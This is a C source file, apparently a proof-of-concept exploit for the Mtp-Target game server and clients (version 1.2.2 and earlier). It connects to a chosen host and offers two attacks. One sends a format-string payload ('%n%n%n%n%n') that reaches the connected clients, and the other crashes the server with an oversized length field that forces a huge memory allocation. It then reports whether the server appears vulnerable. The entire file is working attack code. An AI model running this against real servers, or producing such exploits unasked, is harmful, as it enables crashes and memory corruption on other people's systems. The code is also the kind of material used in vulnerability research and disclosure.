/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER         "0.1"
#define BUFFSZ      65536
#define PORT        51574
#define TIMEOUT     5
#define HEADSZ      5
#define MSGFS       "%n%n%n%n%n"



void send_mtp(int sd, u_char *buff, u_long len);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            attack;
    u_short port = PORT;
    u_char  *buff,
            *data;
    struct nel_head {
        u_long  msgnum;
        u_char  msg;
    } *nh;


    setbuf(stdout, NULL);

    fputs("\n"
        "Mtp-Target <= 1.2.2 clients format string and server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%d)]\n"
            "\n"
            "Attacks:\n"
            " 1 = message format string versus the clients in the server\n"
            " 2 = server crash through big memory allocation\n"
            "\n", argv[0], port);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();
    nh   = (struct nel_head *)buff;
    data = buff + HEADSZ;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    attack = atoi(argv[1]);

    if(attack == 1) {
        *(u_long *)data = sizeof(MSGFS) - 1;
        memcpy(data + 4, MSGFS, sizeof(MSGFS) - 1);
        nh->msgnum = 0;
        nh->msg    = 1;
        fputs("- send malformed data\n", stdout);
        send_mtp(sd, buff, HEADSZ + 4 + (sizeof(MSGFS) - 1));

    } else if(attack == 2) {
        *(u_long *)data = 0xffffffffL;  // should be max 1000000
        nh->msgnum = 0;
        nh->msg    = 1;
        fputs("- send malformed data\n", stdout);
        send_mtp(sd, buff, HEADSZ + 4);

        fputs("- check server\n", stdout);
        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
       }

    } else {
        fputs("\nError: wrong attack chosen, check the available attack numbers at runtime\n\n", stdout);
        exit(1);
    }

    close(sd);
    return(0);
}



void send_mtp(int sd, u_char *buff, u_long len) {
    u_long  tmp = htonl(len);

    if(send(sd, (void *)&tmp, 4, 0)
      < 0) std_err();
    if(send(sd, buff, len, 0)
      < 0) std_err();
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

